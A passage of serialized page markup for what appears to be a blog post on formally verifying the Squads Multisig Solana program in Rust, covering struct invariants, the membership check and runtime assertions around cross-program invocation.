alue":23876},{"type":27,"tag":207,"props":34691,"children":34692},{"style":226},[34693],{"type":33,"value":10768},{"type":27,"tag":207,"props":34695,"children":34696},{"style":1335},[34697],{"type":33,"value":26744},{"type":27,"tag":207,"props":34699,"children":34700},{"style":238},[34701],{"type":33,"value":1343},{"type":27,"tag":207,"props":34703,"children":34704},{"style":214},[34705],{"type":33,"value":20990},{"type":27,"tag":207,"props":34707,"children":34708},{"style":226},[34709],{"type":33,"value":1041},{"type":27,"tag":207,"props":34711,"children":34712},{"style":238},[34713],{"type":33,"value":33354},{"type":27,"tag":207,"props":34715,"children":34716},{"class":209,"line":445},[34717,34722,34726,34730,34734,34738,34742,34746,34750,34754,34758,34762,34766,34770,34774,34778],{"type":27,"tag":207,"props":34718,"children":34719},{"style":214},[34720],{"type":33,"value":34721}," self",{"type":27,"tag":207,"props":34723,"children":34724},{"style":226},[34725],{"type":33,"value":1041},{"type":27,"tag":207,"props":34727,"children":34728},{"style":238},[34729],{"type":33,"value":28343},{"type":27,"tag":207,"props":34731,"children":34732},{"style":226},[34733],{"type":33,"value":10380},{"type":27,"tag":207,"props":34735,"children":34736},{"style":214},[34737],{"type":33,"value":21073},{"type":27,"tag":207,"props":34739,"children":34740},{"style":226},[34741],{"type":33,"value":1041},{"type":27,"tag":207,"props":34743,"children":34744},{"style":238},[34745],{"type":33,"value":28255},{"type":27,"tag":207,"props":34747,"children":34748},{"style":226},[34749],{"type":33,"value":1041},{"type":27,"tag":207,"props":34751,"children":34752},{"style":1335},[34753],{"type":33,"value":16416},{"type":27,"tag":207,"props":34755,"children":34756},{"style":238},[34757],{"type":33,"value":21155},{"type":27,"tag":207,"props":34759,"children":34760},{"style":226},[34761],{"type":33,"value":1041},{"type":27,"tag":207,"props":34763,"children":34764},{"style":1335},[34765],{"type":33,"value":33427},{"type":27,"tag":207,"props":34767,"children":34768},{"style":238},[34769],{"type":33,"value":21155},{"type":27,"tag":207,"props":34771,"children":34772},{"style":226},[34773],{"type":33,"value":1041},{"type":27,"tag":207,"props":34775,"children":34776},{"style":1335},[34777],{"type":33,"value":10952},{"type":27,"tag":207,"props":34779,"children":34780},{"style":238},[34781],{"type":33,"value":4301},{"type":27,"tag":207,"props":34783,"children":34784},{"class":209,"line":867},[34785],{"type":27,"tag":207,"props":34786,"children":34787},{"style":238},[34788],{"type":33,"value":10637},{"type":27,"tag":207,"props":34790,"children":34791},{"class":209,"line":892},[34792],{"type":27,"tag":207,"props":34793,"children":34794},{"style":238},[34795],{"type":33,"value":10645},{"type":27,"tag":207,"props":34797,"children":34798},{"class":209,"line":1475},[34799,34803],{"type":27,"tag":207,"props":34800,"children":34801},{"style":8920},[34802],{"type":33,"value":21609},{"type":27,"tag":207,"props":34804,"children":34805},{"style":238},[34806],{"type":33,"value":21614},{"type":27,"tag":207,"props":34808,"children":34809},{"class":209,"line":2065},[34810],{"type":27,"tag":207,"props":34811,"children":34812},{"style":238},[34813],{"type":33,"value":451},{"type":27,"tag":36,"props":34815,"children":34816},{},[34817,34819,34824,34826,34832,34834,34840,34842,34847],{"type":33,"value":34818},"Inside ",{"type":27,"tag":84,"props":34820,"children":34822},{"className":34821},[],[34823],{"type":33,"value":34478},{"type":33,"value":34825},", we see that it performs a ",{"type":27,"tag":84,"props":34827,"children":34829},{"className":34828},[],[34830],{"type":33,"value":34831},"binary_search",{"type":33,"value":34833}," on the keys vec and returns the index or ",{"type":27,"tag":84,"props":34835,"children":34837},{"className":34836},[],[34838],{"type":33,"value":34839},"None",{"type":33,"value":34841},". Since the vec has size zero, this will just return ",{"type":27,"tag":84,"props":34843,"children":34845},{"className":34844},[],[34846],{"type":33,"value":34839},{"type":33,"value":1041},{"type":27,"tag":101,"props":34849,"children":34851},{"code":34850,"language":10269,"meta":7,"className":10270,"style":7},"pub fn is_member(&self, member: Pubkey) -> Option\u003Cusize> {\n match self.keys.binary_search(&member) {\n Ok(ind) => Some(ind),\n _ => None,\n }\n}\n",[34852],{"type":27,"tag":84,"props":34853,"children":34854},{"__ignoreMap":7},[34855,34924,34967,35006,35028,35035],{"type":27,"tag":207,"props":34856,"children":34857},{"class":209,"line":210},[34858,34862,34866,34871,34875,34879,34883,34887,34891,34895,34899,34903,34907,34912,34916,34920],{"type":27,"tag":207,"props":34859,"children":34860},{"style":214},[34861],{"type":33,"value":20967},{"type":27,"tag":207,"props":34863,"children":34864},{"style":214},[34865],{"type":33,"value":20972},{"type":27,"tag":207,"props":34867,"children":34868},{"style":1335},[34869],{"type":33,"value":34870}," is_member",{"type":27,"tag":207,"props":34872,"children":34873},{"style":238},[34874],{"type":33,"value":1343},{"type":27,"tag":207,"props":34876,"children":34877},{"style":226},[34878],{"type":33,"value":10398},{"type":27,"tag":207,"props":34880,"children":34881},{"style":214},[34882],{"type":33,"value":20990},{"type":27,"tag":207,"props":34884,"children":34885},{"style":238},[34886],{"type":33,"value":1123},{"type":27,"tag":207,"props":34888,"children":34889},{"style":220},[34890],{"type":33,"value":34534},{"type":27,"tag":207,"props":34892,"children":34893},{"style":226},[34894],{"type":33,"value":736},{"type":27,"tag":207,"props":34896,"children":34897},{"style":8920},[34898],{"type":33,"value":28129},{"type":27,"tag":207,"props":34900,"children":34901},{"style":238},[34902],{"type":33,"value":2222},{"type":27,"tag":207,"props":34904,"children":34905},{"style":226},[34906],{"type":33,"value":8968},{"type":27,"tag":207,"props":34908,"children":34909},{"style":8920},[34910],{"type":33,"value":34911}," Option",{"type":27,"tag":207,"props":34913,"children":34914},{"style":238},[34915],{"type":33,"value":9257},{"type":27,"tag":207,"props":34917,"children":34918},{"style":8920},[34919],{"type":33,"value":23876},{"type":27,"tag":207,"props":34921,"children":34922},{"style":238},[34923],{"type":33,"value":14563},{"type":27,"tag":207,"props":34925,"children":34926},{"class":209,"line":244},[34927,34931,34935,34939,34943,34947,34951,34955,34959,34963],{"type":27,"tag":207,"props":34928,"children":34929},{"style":376},[34930],{"type":33,"value":22029},{"type":27,"tag":207,"props":34932,"children":34933},{"style":214},[34934],{"type":33,"value":21073},{"type":27,"tag":207,"props":34936,"children":34937},{"style":226},[34938],{"type":33,"value":1041},{"type":27,"tag":207,"props":34940,"children":34941},{"style":238},[34942],{"type":33,"value":28255},{"type":27,"tag":207,"props":34944,"children":34945},{"style":226},[34946],{"type":33,"value":1041},{"type":27,"tag":207,"props":34948,"children":34949},{"style":1335},[34950],{"type":33,"value":34831},{"type":27,"tag":207,"props":34952,"children":34953},{"style":238},[34954],{"type":33,"value":1343},{"type":27,"tag":207,"props":34956,"children":34957},{"style":226},[34958],{"type":33,"value":10398},{"type":27,"tag":207,"props":34960,"children":34961},{"style":220},[34962],{"type":33,"value":34534},{"type":27,"tag":207,"props":34964,"children":34965},{"style":238},[34966],{"type":33,"value":1424},{"type":27,"tag":207,"props":34968,"children":34969},{"class":209,"line":270},[34970,34974,34978,34982,34986,34990,34994,34998,35002],{"type":27,"tag":207,"props":34971,"children":34972},{"style":8920},[34973],{"type":33,"value":22087},{"type":27,"tag":207,"props":34975,"children":34976},{"style":238},[34977],{"type":33,"value":1343},{"type":27,"tag":207,"props":34979,"children":34980},{"style":220},[34981],{"type":33,"value":34584},{"type":27,"tag":207,"props":34983,"children":34984},{"style":238},[34985],{"type":33,"value":2222},{"type":27,"tag":207,"props":34987,"children":34988},{"style":226},[34989],{"type":33,"value":2321},{"type":27,"tag":207,"props":34991,"children":34992},{"style":8920},[34993],{"type":33,"value":34575},{"type":27,"tag":207,"props":34995,"children":34996},{"style":238},[34997],{"type":33,"value":1343},{"type":27,"tag":207,"props":34999,"children":35000},{"style":220},[35001],{"type":33,"value":34584},{"type":27,"tag":207,"props":35003,"children":35004},{"style":238},[35005],{"type":33,"value":14018},{"type":27,"tag":207,"props":35007,"children":35008},{"class":209,"line":296},[35009,35014,35019,35024],{"type":27,"tag":207,"props":35010,"children":35011},{"style":220},[35012],{"type":33,"value":35013}," _",{"type":27,"tag":207,"props":35015,"children":35016},{"style":226},[35017],{"type":33,"value":35018}," =>",{"type":27,"tag":207,"props":35020,"children":35021},{"style":8920},[35022],{"type":33,"value":35023}," None",{"type":27,"tag":207,"props":35025,"children":35026},{"style":238},[35027],{"type":33,"value":1842},{"type":27,"tag":207,"props":35029,"children":35030},{"class":209,"line":445},[35031],{"type":27,"tag":207,"props":35032,"children":35033},{"style":238},[35034],{"type":33,"value":10645},{"type":27,"tag":207,"props":35036,"children":35037},{"class":209,"line":867},[35038],{"type":27,"tag":207,"props":35039,"children":35040},{"style":238},[35041],{"type":33,"value":451},{"type":27,"tag":36,"props":35043,"children":35044},{},[35045,35047,35052,35054,35059,35061,35066,35068,35073],{"type":33,"value":35046},"So interestingly, a ",{"type":27,"tag":84,"props":35048,"children":35050},{"className":35049},[],[35051],{"type":33,"value":28255},{"type":33,"value":35053}," vec of size 0 ",{"type":27,"tag":942,"props":35055,"children":35056},{},[35057],{"type":33,"value":35058},"is actually",{"type":33,"value":35060}," a sufficient condition to execute ",{"type":27,"tag":84,"props":35062,"children":35064},{"className":35063},[],[35065],{"type":33,"value":32731},{"type":33,"value":35067},". However would it ever actually happen? Well we know from before that when we create the multisig, the threshold must be less than or equal to the number of keys and also greater than zero. So in any ",{"type":27,"tag":942,"props":35069,"children":35070},{},[35071],{"type":33,"value":35072},"valid",{"type":33,"value":35074}," multisig, the number of keys should never be zero.",{"type":27,"tag":36,"props":35076,"children":35077},{},[35078,35080,35085],{"type":33,"value":35079},"We can represent this ",{"type":27,"tag":942,"props":35081,"children":35082},{},[35083],{"type":33,"value":35084},"validity",{"type":33,"value":35086}," with a struct invariant. In fact the invariant we defined earlier will be sufficient:",{"type":27,"tag":101,"props":35088,"children":35090},{"code":35089,"language":10269,"meta":7,"className":10270,"style":7},"#[invariant(\n (self.threshold >= 1)\n && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms { ... }\n",[35091],{"type":27,"tag":84,"props":35092,"children":35093},{"__ignoreMap":7},[35094,35101,35124,35175,35182],{"type":27,"tag":207,"props":35095,"children":35096},{"class":209,"line":210},[35097],{"type":27,"tag":207,"props":35098,"children":35099},{"style":238},[35100],{"type":33,"value":28050},{"type":27,"tag":207,"props":35102,"children":35103},{"class":209,"line":244},[35104,35108,35112,35116,35120],{"type":27,"tag":207,"props":35105,"children":35106},{"style":238},[35107],{"type":33,"value":31994},{"type":27,"tag":207,"props":35109,"children":35110},{"style":226},[35111],{"type":33,"value":1041},{"type":27,"tag":207,"props":35113,"children":35114},{"style":238},[35115],{"type":33,"value":28343},{"type":27,"tag":207,"props":35117,"children":35118},{"style":226},[35119],{"type":33,"value":17220},{"type":27,"tag":207,"props":35121,"children":35122},{"style":238},[35123],{"type":33,"value":28352},{"type":27,"tag":207,"props":35125,"children":35126},{"class":209,"line":270},[35127,35131,35135,35139,35143,35147,35151,35155,35159,35163,35167,35171],{"type":27,"tag":207,"props":35128,"children":35129},{"style":226},[35130],{"type":33,"value":22896},{"type":27,"tag":207,"props":35132,"children":35133},{"style":238},[35134],{"type":33,"value":28276},{"type":27,"tag":207,"props":35136,"children":35137},{"style":226},[35138],{"type":33,"value":1041},{"type":27,"tag":207,"props":35140,"children":35141},{"style":238},[35142],{"type":33,"value":28343},{"type":27,"tag":207,"props":35144,"children":35145},{"style":214},[35146],{"type":33,"value":16122},{"type":27,"tag":207,"props":35148,"children":35149},{"style":8920},[35150],{"type":33,"value":21008},{"type":27,"tag":207,"props":35152,"children":35153},{"style":226},[35154],{"type":33,"value":15478},{"type":27,"tag":207,"props":35156,"children":35157},{"style":238},[35158],{"type":33,"value":21073},{"type":27,"tag":207,"props":35160,"children":35161},{"style":226},[35162],{"type":33,"value":1041},{"type":27,"tag":207,"props":35164,"children":35165},{"style":238},[35166],{"type":33,"value":28255},{"type":27,"tag":207,"props":35168,"children":35169},{"style":226},[35170],{"type":33,"value":1041},{"type":27,"tag":207,"props":35172,"children":35173},{"style":238},[35174],{"type":33,"value":28404},{"type":27,"tag":207,"props":35176,"children":35177},{"class":209,"line":296},[35178],{"type":27,"tag":207,"props":35179,"children":35180},{"style":238},[35181],{"type":33,"value":27530},{"type":27,"tag":207,"props":35183,"children":35184},{"class":209,"line":445},[35185,35189,35193,35197,35201,35205],{"type":27,"tag":207,"props":35186,"children":35187},{"style":214},[35188],{"type":33,"value":20967},{"type":27,"tag":207,"props":35190,"children":35191},{"style":214},[35192],{"type":33,"value":28423},{"type":27,"tag":207,"props":35194,"children":35195},{"style":8920},[35196],{"type":33,"value":28428},{"type":27,"tag":207,"props":35198,"children":35199},{"style":238},[35200],{"type":33,"value":16862},{"type":27,"tag":207,"props":35202,"children":35203},{"style":226},[35204],{"type":33,"value":16867},{"type":27,"tag":207,"props":35206,"children":35207},{"style":238},[35208],{"type":33,"value":16872},{"type":27,"tag":36,"props":35210,"children":35211},{},[35212,35214,35220,35222,35228],{"type":33,"value":35213},"The use of a struct invariant allows us to define (and verify) the possible states that an account can be in at the start and end of an instruction. In this case, our struct invariant rules out the case where ",{"type":27,"tag":84,"props":35215,"children":35217},{"className":35216},[],[35218],{"type":33,"value":35219},"keys.len() == 0",{"type":33,"value":35221}," and allows us to prove the biconditional ",{"type":27,"tag":84,"props":35223,"children":35225},{"className":35224},[],[35226],{"type":33,"value":35227},"(keys.len() >= 1) -> (instruction succeeds)",{"type":33,"value":1041},{"type":27,"tag":58,"props":35230,"children":35232},{"id":35231},"safety-guarantees",[35233],{"type":33,"value":30057},{"type":27,"tag":36,"props":35235,"children":35236},{},[35237],{"type":33,"value":35238},"Formal verification is an awesome technique but it is not perfect. There are situations where things are not possible to formally verify and you need to resort to other methods.",{"type":27,"tag":36,"props":35240,"children":35241},{},[35242],{"type":33,"value":35243},"In particular, one of the difficult-to-verify parts of the Squads Multisig program is cross-program-invocation. Specifically, since cross-program-invocation executes foreign code, it is difficult (if not impossible) to verify whether this will succeed or fail.",{"type":27,"tag":36,"props":35245,"children":35246},{},[35247,35249,35255],{"type":33,"value":35248},"In the multisig program this happens in the ",{"type":27,"tag":84,"props":35250,"children":35252},{"className":35251},[],[35253],{"type":33,"value":35254},"execute_transaction",{"type":33,"value":35256}," instruction.",{"type":27,"tag":36,"props":35258,"children":35259},{},[35260],{"type":27,"tag":942,"props":35261,"children":35262},{},[35263],{"type":33,"value":35264},"So what do you do?",{"type":27,"tag":36,"props":35266,"children":35267},{},[35268],{"type":33,"value":35269},"For example, in a worst-case scenario you could imagine a situation like the following:",{"type":27,"tag":101,"props":35271,"children":35273},{"code":35272,"language":10269,"meta":7,"className":10270,"style":7},"#[derive(Accounts)]\npub MyCtx {\n #[account(mut)]\n pub my_account: Account\u003C'info, Acc>\n}\n\n#[account]\n#[invariant(bad == false)]\nstruct Acc {\n pub bad: bool\n}\n\nimpl Acc {\n pub fn put_into_bad_state() {\n self.bad = true;\n }\n}\n\n// Instruction handler:\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n invoke_signed(...); // Cross-program invocation\n\n let invoke_res = ...; // fetch result of invocation\n if invoke_res == 5 {\n ctx.my_account.put_into_bad_state(); // corrupt our account\n }\n Ok(())\n}\n",[35274],{"type":27,"tag":84,"props":35275,"children":35276},{"__ignoreMap":7},[35277,35292,35308,35323,35364,35371,35378,35385,35402,35418,35439,35446,35453,35469,35489,35517,35524,35531,35538,35546,35599,35625,35632,35661,35685,35720,35727,35738],{"type":27,"tag":207,"props":35278,"children":35279},{"class":209,"line":210},[35280,35284,35288],{"type":27,"tag":207,"props":35281,"children":35282},{"style":238},[35283],{"type":33,"value":30110},{"type":27,"tag":207,"props":35285,"children":35286},{"style":8920},[35287],{"type":33,"value":30115},{"type":27,"tag":207,"props":35289,"children":35290},{"style":238},[35291],{"type":33,"value":27530},{"type":27,"tag":207,"props":35293,"children":35294},{"class":209,"line":244},[35295,35299,35304],{"type":27,"tag":207,"props":35296,"children":35297},{"style":214},[35298],{"type":33,"value":20967},{"type":27,"tag":207,"props":35300,"children":35301},{"style":8920},[35302],{"type":33,"value":35303}," MyCtx",{"type":27,"tag":207,"props":35305,"children":35306},{"style":238},[35307],{"type":33,"value":384},{"type":27,"tag":207,"props":35309,"children":35310},{"class":209,"line":270},[35311,35315,35319],{"type":27,"tag":207,"props":35312,"children":35313},{"style":238},[35314],{"type":33,"value":30402},{"type":27,"tag":207,"props":35316,"children":35317},{"style":214},[35318],{"type":33,"value":11009},{"type":27,"tag":207,"props":35320,"children":35321},{"style":238},[35322],{"type":33,"value":27530},{"type":27,"tag":207,"props":35324,"children":35325},{"class":209,"line":296},[35326,35330,35335,35339,35343,35347,35351,35355,35360],{"type":27,"tag":207,"props":35327,"children":35328},{"style":214},[35329],{"type":33,"value":28115},{"type":27,"tag":207,"props":35331,"children":35332},{"style":220},[35333],{"type":33,"value":35334}," my_account",{"type":27,"tag":207,"props":35336,"children":35337},{"style":226},[35338],{"type":33,"value":736},{"type":27,"tag":207,"props":35340,"children":35341},{"style":8920},[35342],{"type":33,"value":30367},{"type":27,"tag":207,"props":35344,"children":35345},{"style":238},[35346],{"type":33,"value":30195},{"type":27,"tag":207,"props":35348,"children":35349},{"style":8920},[35350],{"type":33,"value":30200},{"type":27,"tag":207,"props":35352,"children":35353},{"style":238},[35354],{"type":33,"value":1123},{"type":27,"tag":207,"props":35356,"children":35357},{"style":8920},[35358],{"type":33,"value":35359},"Acc",{"type":27,"tag":207,"props":35361,"children":35362},{"style":238},[35363],{"type":33,"value":13274},{"type":27,"tag":207,"props":35365,"children":35366},{"class":209,"line":445},[35367],{"type":27,"tag":207,"props":35368,"children":35369},{"style":238},[35370],{"type":33,"value":451},{"type":27,"tag":207,"props":35372,"children":35373},{"class":209,"line":867},[35374],{"type":27,"tag":207,"props":35375,"children":35376},{"emptyLinePlaceholder":19},[35377],{"type":33,"value":2062},{"type":27,"tag":207,"props":35379,"children":35380},{"class":209,"line":892},[35381],{"type":27,"tag":207,"props":35382,"children":35383},{"style":238},[35384],{"type":33,"value":28042},{"type":27,"tag":207,"props":35386,"children":35387},{"class":209,"line":1475},[35388,35393,35397],{"type":27,"tag":207,"props":35389,"children":35390},{"style":238},[35391],{"type":33,"value":35392},"#[invariant(bad ",{"type":27,"tag":207,"props":35394,"children":35395},{"style":226},[35396],{"type":33,"value":15856},{"type":27,"tag":207,"props":35398,"children":35399},{"style":238},[35400],{"type":33,"value":35401}," false)]\n",{"type":27,"tag":207,"props":35403,"children":35404},{"class":209,"line":2065},[35405,35409,35414],{"type":27,"tag":207,"props":35406,"children":35407},{"style":214},[35408],{"type":33,"value":16677},{"type":27,"tag":207,"props":35410,"children":35411},{"style":8920},[35412],{"type":33,"value":35413}," Acc",{"type":27,"tag":207,"props":35415,"children":35416},{"style":238},[35417],{"type":33,"value":384},{"type":27,"tag":207,"props":35419,"children":35420},{"class":209,"line":2092},[35421,35425,35430,35434],{"type":27,"tag":207,"props":35422,"children":35423},{"style":214},[35424],{"type":33,"value":28115},{"type":27,"tag":207,"props":35426,"children":35427},{"style":220},[35428],{"type":33,"value":35429}," bad",{"type":27,"tag":207,"props":35431,"children":35432},{"style":226},[35433],{"type":33,"value":736},{"type":27,"tag":207,"props":35435,"children":35436},{"style":8920},[35437],{"type":33,"value":35438}," bool\n",{"type":27,"tag":207,"props":35440,"children":35441},{"class":209,"line":2130},[35442],{"type":27,"tag":207,"props":35443,"children":35444},{"style":238},[35445],{"type":33,"value":451},{"type":27,"tag":207,"props":35447,"children":35448},{"class":209,"line":2168},[35449],{"type":27,"tag":207,"props":35450,"children":35451},{"emptyLinePlaceholder":19},[35452],{"type":33,"value":2062},{"type":27,"tag":207,"props":35454,"children":35455},{"class":209,"line":4095},[35456,35461,35465],{"type":27,"tag":207,"props":35457,"children":35458},{"style":214},[35459],{"type":33,"value":35460},"impl",{"type":27,"tag":207,"props":35462,"children":35463},{"style":8920},[35464],{"type":33,"value":35413},{"type":27,"tag":207,"props":35466,"children":35467},{"style":238},[35468],{"type":33,"value":384},{"type":27,"tag":207,"props":35470,"children":35471},{"class":209,"line":4103},[35472,35476,35480,35485],{"type":27,"tag":207,"props":35473,"children":35474},{"style":214},[35475],{"type":33,"value":28115},{"type":27,"tag":207,"props":35477,"children":35478},{"style":214},[35479],{"type":33,"value":20972},{"type":27,"tag":207,"props":35481,"children":35482},{"style":1335},[35483],{"type":33,"value":35484}," put_into_bad_state",{"type":27,"tag":207,"props":35486,"children":35487},{"style":238},[35488],{"type":33,"value":23011},{"type":27,"tag":207,"props":35490,"children":35491},{"class":209,"line":4154},[35492,35496,35500,35505,35509,35513],{"type":27,"tag":207,"props":35493,"children":35494},{"style":214},[35495],{"type":33,"value":34625},{"type":27,"tag":207,"props":35497,"children":35498},{"style":226},[35499],{"type":33,"value":1041},{"type":27,"tag":207,"props":35501,"children":35502},{"style":238},[35503],{"type":33,"value":35504},"bad ",{"type":27,"tag":207,"props":35506,"children":35507},{"style":226},[35508],{"type":33,"value":10380},{"type":27,"tag":207,"props":35510,"children":35511},{"style":214},[35512],{"type":33,"value":19746},{"type":27,"tag":207,"props":35514,"children":35515},{"style":238},[35516],{"type":33,"value":241},{"type":27,"tag":207,"props":35518,"children":35519},{"class":209,"line":4203},[35520],{"type":27,"tag":207,"props":35521,"children":35522},{"style":238},[35523],{"type":33,"value":10645},{"type":27,"tag":207,"props":35525,"children":35526},{"class":209,"line":4249},[35527],{"type":27,"tag":207,"props":35528,"children":35529},{"style":238},[35530],{"type":33,"value":451},{"type":27,"tag":207,"props":35532,"children":35533},{"class":209,"line":4290},[35534],{"type":27,"tag":207,"props":35535,"children":35536},{"emptyLinePlaceholder":19},[35537],{"type":33,"value":2062},{"type":27,"tag":207,"props":35539,"children":35540},{"class":209,"line":4304},[35541],{"type":27,"tag":207,"props":35542,"children":35543},{"style":4647},[35544],{"type":33,"value":35545},"// Instruction handler:\n",{"type":27,"tag":207,"props":35547,"children":35548},{"class":209,"line":5466},[35549,35553,35558,35562,35566,35570,35574,35578,35583,35587,35591,35595],{"type":27,"tag":207,"props":35550,"children":35551},{"style":214},[35552],{"type":33,"value":27538},{"type":27,"tag":207,"props":35554,"children":35555},{"style":1335},[35556],{"type":33,"value":35557}," hard_to_verify",{"type":27,"tag":207,"props":35559,"children":35560},{"style":238},[35561],{"type":33,"value":1343},{"type":27,"tag":207,"props":35563,"children":35564},{"style":220},[35565],{"type":33,"value":27552},{"type":27,"tag":207,"props":35567,"children":35568},{"style":226},[35569],{"type":33,"value":736},{"type":27,"tag":207,"props":35571,"children":35572},{"style":8920},[35573],{"type":33,"value":27561},{"type":27,"tag":207,"props":35575,"children":35576},{"style":238},[35577],{"type":33,"value":9257},{"type":27,"tag":207,"props":35579,"children":35580},{"style":8920},[35581],{"type":33,"value":35582},"MyCtx",{"type":27,"tag":207,"props":35584,"children":35585},{"style":238},[35586],{"type":33,"value":27718},{"type":27,"tag":207,"props":35588,"children":35589},{"style":226},[35590],{"type":33,"value":8968},{"type":27,"tag":207,"props":35592,"children":35593},{"style":8920},[35594],{"type":33,"value":21038},{"type":27,"tag":207,"props":35596,"children":35597},{"style":238},[35598],{"type":33,"value":27603},{"type":27,"tag":207,"props":35600,"children":35601},{"class":209,"line":5530},[35602,35607,35611,35615,35620],{"type":27,"tag":207,"props":35603,"children":35604},{"style":1335},[35605],{"type":33,"value":35606}," invoke_signed",{"type":27,"tag":207,"props":35608,"children":35609},{"style":238},[35610],{"type":33,"value":1343},{"type":27,"tag":207,"props":35612,"children":35613},{"style":226},[35614],{"type":33,"value":16867},{"type":27,"tag":207,"props":35616,"children":35617},{"style":238},[35618],{"type":33,"value":35619},"); ",{"type":27,"tag":207,"props":35621,"children":35622},{"style":4647},[35623],{"type":33,"value":35624},"// Cross-program invocation\n",{"type":27,"tag":207,"props":35626,"children":35627},{"class":209,"line":7900},[35628],{"type":27,"tag":207,"props":35629,"children":35630},{"emptyLinePlaceholder":19},[35631],{"type":33,"value":2062},{"type":27,"tag":207,"props":35633,"children":35634},{"class":209,"line":7909},[35635,35639,35644,35648,35652,35656],{"type":27,"tag":207,"props":35636,"children":35637},{"style":214},[35638],{"type":33,"value":10290},{"type":27,"tag":207,"props":35640,"children":35641},{"style":220},[35642],{"type":33,"value":35643}," invoke_res",{"type":27,"tag":207,"props":35645,"children":35646},{"style":226},[35647],{"type":33,"value":229},{"type":27,"tag":207,"props":35649,"children":35650},{"style":226},[35651],{"type":33,"value":32564},{"type":27,"tag":207,"props":35653,"children":35654},{"style":238},[35655],{"type":33,"value":4685},{"type":27,"tag":207,"props":35657,"children":35658},{"style":4647},[35659],{"type":33,"value":35660},"// fetch result of invocation\n",{"type":27,"tag":207,"props":35662,"children":35663},{"class":209,"line":7917},[35664,35668,35672,35676,35681],{"type":27,"tag":207,"props":35665,"children":35666},{"style":376},[35667],{"type":33,"value":19556},{"type":27,"tag":207,"props":35669,"children":35670},{"style":220},[35671],{"type":33,"value":35643},{"type":27,"tag":207,"props":35673,"children":35674},{"style":226},[35675],{"type":33,"value":10572},{"type":27,"tag":207,"props":35677,"children":35678},{"style":232},[35679],{"type":33,"value":35680}," 5",{"type":27,"tag":207,"props":35682,"children":35683},{"style":238},[35684],{"type":33,"value":384},{"type":27,"tag":207,"props":35686,"children":35687},{"class":209,"line":7926},[35688,35692,35696,35701,35705,35710,35715],{"type":27,"tag":207,"props":35689,"children":35690},{"style":220},[35691],{"type":33,"value":33451},{"type":27,"tag":207,"props":35693,"children":35694},{"style":226},[35695],{"type":33,"value":1041},{"type":27,"tag":207,"props":35697,"children":35698},{"style":238},[35699],{"type":33,"value":35700},"my_account",{"type":27,"tag":207,"props":35702,"children":35703},{"style":226},[35704],{"type":33,"value":1041},{"type":27,"tag":207,"props":35706,"children":35707},{"style":1335},[35708],{"type":33,"value":35709},"put_into_bad_state",{"type":27,"tag":207,"props":35711,"children":35712},{"style":238},[35713],{"type":33,"value":35714},"(); ",{"type":27,"tag":207,"props":35716,"children":35717},{"style":4647},[35718],{"type":33,"value":35719},"// corrupt our account\n",{"type":27,"tag":207,"props":35721,"children":35722},{"class":209,"line":7934},[35723],{"type":27,"tag":207,"props":35724,"children":35725},{"style":238},[35726],{"type":33,"value":10645},{"type":27,"tag":207,"props":35728,"children":35729},{"class":209,"line":7943},[35730,35734],{"type":27,"tag":207,"props":35731,"children":35732},{"style":8920},[35733],{"type":33,"value":21609},{"type":27,"tag":207,"props":35735,"children":35736},{"style":238},[35737],{"type":33,"value":21614},{"type":27,"tag":207,"props":35739,"children":35740},{"class":209,"line":7952},[35741],{"type":27,"tag":207,"props":35742,"children":35743},{"style":238},[35744],{"type":33,"value":451},{"type":27,"tag":36,"props":35746,"children":35747},{},[35748,35750,35755],{"type":33,"value":35749},"The integrity of the verification framework relies on the fact that the account invariants for the accounts contained in the instruction (in this case ",{"type":27,"tag":84,"props":35751,"children":35753},{"className":35752},[],[35754],{"type":33,"value":35700},{"type":33,"value":35756},") will be maintained as long as the instruction succeeds.",{"type":27,"tag":36,"props":35758,"children":35759},{},[35760],{"type":33,"value":35761},"In this case, we can't really verify if the instruction succeeds or not (at least without knowing which program/instruction will be invoked).",{"type":27,"tag":36,"props":35763,"children":35764},{},[35765,35767,35772],{"type":33,"value":35766},"However, we can ",{"type":27,"tag":942,"props":35768,"children":35769},{},[35770],{"type":33,"value":35771},"augment",{"type":33,"value":35773}," our code with additional runtime constraints to ensure that the safety properties are preserved even if formal verification fails.",{"type":27,"tag":36,"props":35775,"children":35776},{},[35777],{"type":33,"value":35778},"In this case, we can add runtime assertions that ensure our runtime invariants hold. For example:",{"type":27,"tag":101,"props":35780,"children":35782},{"code":35781,"language":10269,"meta":7,"className":10270,"style":7},"...\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n invoke_signed(...); // Cross-program invocation\n\n let invoke_res = ...; // fetch result of invocation\n if invoke_res == 5 {\n ctx.my_account.put_into_bad_state(); // corrupt our account\n }\n\n // Enforce invariants at runtime\n assert(ctx.my_account.invariant());\n\n Ok(())\n}\n",[35783],{"type":27,"tag":84,"props":35784,"children":35785},{"__ignoreMap":7},[35786,35794,35845,35868,35875,35902,35925,35956,35963,35970,35978,36013,36020,36031],{"type":27,"tag":207,"props":35787,"children":35788},{"class":209,"line":210},[35789],{"type":27,"tag":207,"props":35790,"children":35791},{"style":226},[35792],{"type":33,"value":35793},"...\n",{"type":27,"tag":207,"props":35795,"children":35796},{"class":209,"line":244},[35797,35801,35805,35809,35813,35817,35821,35825,35829,35833,35837,35841],{"type":27,"tag":207,"props":35798,"children":35799},{"style":214},[35800],{"type":33,"value":27538},{"type":27,"tag":207,"props":35802,"children":35803},{"style":1335},[35804],{"type":33,"value":35557},{"type":27,"tag":207,"props":35806,"children":35807},{"style":238},[35808],{"type":33,"value":1343},{"type":27,"tag":207,"props":35810,"children":35811},{"style":220},[35812],{"type":33,"value":27552},{"type":27,"tag":207,"props":35814,"children":35815},{"style":226},[35816],{"type":33,"value":736},{"type":27,"tag":207,"props":35818,"children":35819},{"style":8920},[35820],{"type":33,"value":27561},{"type":27,"tag":207,"props":35822,"children":35823},{"style":238},[35824],{"type":33,"value":9257},{"type":27,"tag":207,"props":35826,"children":35827},{"style":8920},[35828],{"type":33,"value":35582},{"type":27,"tag":207,"props":35830,"children":35831},{"style":238},[35832],{"type":33,"value":27718},{"type":27,"tag":207,"props":35834,"children":35835},{"style":226},[35836],{"type":33,"value":8968},{"type":27,"tag":207,"props":35838,"children":35839},{"style":8920},[35840],{"type":33,"value":21038},{"type":27,"tag":207,"props":35842,"children":35843},{"style":238},[35844],{"type":33,"value":27603},{"type":27,"tag":207,"props":35846,"children":35847},{"class":209,"line":270},[35848,35852,35856,35860,35864],{"type":27,"tag":207,"props":35849,"c